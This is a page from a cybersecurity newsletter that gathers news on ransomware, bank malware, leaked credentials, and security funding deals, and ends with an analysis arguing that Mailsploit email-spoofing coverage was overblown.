Inside Security | Inside

[ Inside Security ]

David Strom's in-depth cybersecurity analysis

David’s Take

We have a collection of new and old ransomware attacks discovered over the past week, showing how criminals just can’t get enough of this tactic, and some are even using A/B testing to refine their techniques.

I have been posting numerous articles about the changing world of SSL certs and how EV certs are being used by criminals to make their phishing sites appear more legit. Now a security researcher has set up his own demonstration site to illustrate the problem. Take a look at the site It appears (from the browser credential POV) to resemble the Stripe UK payment site, and it authenticates itself to an entity called Stripe Inc. Well, that isn’t the Stripe you are looking for, although it is another company with the same name that the researcher opened in another state just to prove his point. Dan Goodin from Ars writes, “people should remember that EV certificates aren't automatically a panacea for online fraud.”

My favorite report for today is from Watchguard, who have been posting a series of predictions to their blog in a very attractive and still informative way. There are ones about IoT botnets, a doubling of Linux-based attacks, what will happen to MFA, and the state of election and voter hacking.

--David Strom, editor of Inside Security


Top Story: Russian-based MoneyTaker malware on the rise

A Russian-speaking cybercrime group has stolen millions of dollars from more than 20 banks (some shown here in this graphic) in the US and Russia since at least May 2016 and appears poised to strike financial institutions across Latin America next. According to this research from Moscow-based Group-IB, the malware manipulates the inter-bank card processing systems (like SWIFT) to enable fraudulent ATM withdrawals, hence the label given for the exploit. And the yields are huge: we are taking half a million bucks stolen per heist. What is new is how frequently the hackers change tactics and tools and take pains to hide their actions. The researchers found a compromised home PC of a bank’s system admin.

Encrypted key

Attacks and vulnerabilities

A new variant of Blind ransomware carrying a .napoleon extension is being delivered via hacked Microsoft IIS web servers and is now operating in the wild. More details in this post. -- MALWAREBYTES

Subscribe to Inside Security

David’s Take

My favorite year-end report today is from Incapsula, which reports that three out of four bitcoin sites were attacked and a third of the network attacks were persistent.  DDoS volumes are increasing and five percent of network layer assaults reached 50 Mpps, while the largest peaked at 238 Mpps.  Hong Kong was the most targeted country for network layer assaults in Q3 2017, largely because of a persistent attack on a local hosting service that was hit hundreds of times throughout the quarter. This brings home the increasing automation and scope of botnets.

-- David Strom, editor of Inside Security

A trove of 1 4 billion clear text credentials file found on dark web 2

Attacks and vulnerabilities

A Dark Web source revealed almost a billion and a half leaked user credentials and passwords which could make it the larger trove of such data ever disclosed. Researchers suggest the information is culled from numerous individual breachers. The most used password is ‘123456’ -- of course. -- HACKREAD

A HomeKit vulnerability in the current version of iOS 11.2 can allow unauthorized control of accessories including smart locks and garage door openers that are connected to your Apple smart home products. Apple has rolled out a server-side fix and is working on an update to iOS. – 9TO5MAC


Tech support scammers have been using the Spotify forums to inject their phone numbers into the first page of the Google and Bing search results. This pushes up their search rank and makes them attractive targets for callers to purchase their scammy services. The tech support scams being posted to Spotify include Tinder, Linksys, AOL, Turbotax, Coinbase, Amazon, Apple, Microsoft, Norton, McAfee and others. Spotify acknowledged the issue. – CODY JOHNSTON @ TWITTER

Self-promotions dep’t

Here are some best practices to create your own security awareness training efforts, written by someone from KnowBe4 who just coincidentally sells them. Remember, it is the journey not the destination. Still worth reading. – INFOSEC ISLAND

New products and services

AIG is now using a risk analysis system for data breach potential with its corporate insurance customers. The score also takes into account the potential financial losses from a breach. The company also announced partnerships with CrowdStrike and Darktrace to launch a new service called CyberMatics to verify cyber security protection. -- REUTERS


Just for fun

He is serious about his security, because he is salting his hash, get it? Har-har. -- REDDIT


Microsoft leaked a private crypto key for its cloud-based Dynamics ERP service and it was still available online for three months. It took a determined security researcher to get to the right person within Microsoft to get this resolved. Had this fallen into the wrong hands, man-in-the-middle attacks would have child’s play. – MATTHIAS GLIWKA @MEDIUM

Chrome enterprise updates 01.max 1000x1000

Google describes some of the recent security innovations for its Chrome browser, including site isolation, TLS improvements and permissions restrictions. Time to make sure your browsers are updated. – GOOGLE BLOG

AWS announced an SSO tool for its numerous web services, along with support for other SAML apps and SaaS accounts. It integrates with Microsoft Active Directory and works with the AWS module CloudTrail to log access events.

Funding and merger announcements of the week

Tel Aviv-based Ironscales announced the closing of a $6.5M Series A, led by K1 Investment Management. The firm has automated phishing and fraud detection and its CEO is Eyal Benishti.

Integrity360 has acquired managed IT security specialist Metadigm, expanding the firm’s presence in the UK. Financial terms were not disclosed

Continuum Security has secured €1.5M in funding. It is based in Madrid and does integrated threat modeling. Stephen De Vries is its CEO.

Prevoty, a rising application security innovator with offices in LA and the Bay Area, announced $13M in Series B funding from investors including Trident Capital Cybersecurity. The firm specializes in autonomous application self-protection and is led by CEO Julien Bellanger

Overhaul received a $4.5M seed funding round led by Abbey International Finance, it is based in Austin and its CEO is Barry Conion. The firm has a platform to detect non-compliance in premium cargo shipping.

Integrated Biometrics received a $2M funding round. The company is based in South Carolina and is developing FBI-certified fingerprint sensors. The firm’s CEO is Stephen Thies.

Alcide received a $5.2M seed funding round led by Intel Capital and has CEO Ranny Nachmias. It is based in Tel Aviv and is developing a network security platform.

NS8 received a $7.5M seed funding round led by Arbor Ventures. The firm is based in the DC area and has fraud abuse protection for ecommerce merchants. It is led by CEO Adam Rogas.

1511976183044 img 5746

Just for fun

Sometimes security people look for the wrong events. A recent article about how a scammer tricked TripAdvisor into listing his non-existing restaurant (shown is his backyard here) as London’s top dining spot without ever taking on any customers or serving any meals is worth reading.  Turns out TripAdvisor was tracking real restaurants posting fake reviews.  Oops. -- VICE

David's Take

This was an active week for numerous vulnerabilities and attacks and our newsletter today highlights many of them. Some weeks it seems as if everything you use has issues: WordPress, Plone, TeamViewer, and several Android devops tools will all require updates, including a very serious flaw in Windows' malware scanning engine. And then there is this news, where government servers in Mecklenburg County, North Carolina are infected with ransomware. The county has refused to pay $23,000 to decrypt the files. The LockyCrypt malware was delivered through a phished email attachment. “It was going to take almost as long to fix the system after paying the ransom as it does to fix it ourselves,” said the county’s manager. Uhh, perhaps a better reason could be that they have current backups? 

If you aren't yet a Premium subscriber, you missed yesterday's analysis about the poor reporting around the Mailsploit issue, which isn't as serious as first thought. Go to our Premium page and sign up, subscription plans start at $10/month with multiple newsletters and corporate plans available. Premium subscribers get an additional Thursday newsletter, usually with a single analysis topic.

-- David Strom, editor of Inside Security

Cyberbit demos 01 1024x554

Attacks and vulnerabilities

Ethiopian dissidents in the US, UK, and other countries were targeted with emails containing sophisticated commercial spyware originating from Ethiopian state sources. The updates posed as Adobe Flash updates and PDF plugins. – CITIZEN LAB

Wordpress site keylogger

Nearly 5,500 WordPress sites are infected with a malicious script that logs keystrokes and sometimes loads an in-browser cryptocurrency miner. The malicious script is being loaded from a phony domain that contains the word cloudflare, to make it look more legit. What is unusual about this malware is that can be loaded on both the front and back ends of WP installations, so it can capture site admin passwords.  – BLEEPING COMPUTER


Just for fun

Likely.   -- VISS@TWITTER

Email x1 spoof

Is Mailsploit for real?

Earlier this week, the developer Sabri Haddouche announced with great fanfare a “collection of bugs in email clients that allow effective sending spoofing and code injection attacks,” under the name Mailspoit. He found bugs in more than 30 different email apps that supposedly circumvented email protocols such as DMARC, DKIM and SPF, the holy trinity of protection that I have written about extensively on my blog here and in past newsletters.

There are actually two different attack vectors mentioned on the Mailsploit website. The first has to do with malformed mail headers, using punycode character sets for email spoofing. The second has to do with XSS and code injection attacks in the message bodies. Let’s address them in order.

The spoofing attack isn’t really new. While email clients have some issues, what Mailsploit is saying is far from the Chicken Little scenario. DMARC et al. are still sound, and these exploits have little or nothing to do with them. The second XSS attack is more serious, and certain email clients will need patching.

Contributing to the bad information here are my colleagues in the trade press. Wired says: “Haddouche has shown that he can trick email servers into reading email headers one way, while email client programs read them differently.” Well yes, that is essentially true. But not news. Catalin Cimpanu of Bleeping Computer, who normally is very accurate with his reporting, says this email spoofing attack circumvents all modern anti-spoofing protection mechanisms such as DMARC (DKIM/SPF) or various spam filters. That is just false.

“Mailsploit fools DMARC in much the same way that putting Donald J. Trump as your display name in Gmail ‘fools DMARC.’ That is to say, not at all,” says a post on Valimail’s blog. John Wilson from Agari has a similar response on their blog. Note: Both Valimail and Agari sell DMARC-based protection services, so they have some vested interest here. But that doesn’t excuse the sloppy reporting.

The spoofing issue is how punycode characters are interpreted and displayed, which is an issue that I recently wrote about in this newsletter. This has to do with how clients interpret non-Latin alphabets, and has been a staple of phishing attacks for years.

So what should you do? First, look at Haddouche’s spreadsheet of mail clients (a portion shown below) and who has patched and who hasn’t. Most of the major email vendors, including Gmail, Office 365 and Outlook aren’t affected, and Yahoo has already fixed the vulnerability. (Kudos to Haddouche for working responsibly with the vendors prior to disclosing the issue.)

Second, if you are using an email client that hasn’t been patched, now is the time to switch to one that has. Just in time for consideration is a new free product from ProtonMail called Bridge that will allow you to use their end-to-end encrypted email client with Thunderbird, Apple Mail or Outlook. Bridge will automatically encrypt/decrypt in the background.  

Finally, study the punycode attacks of the past so you understand what is going on.

load more stories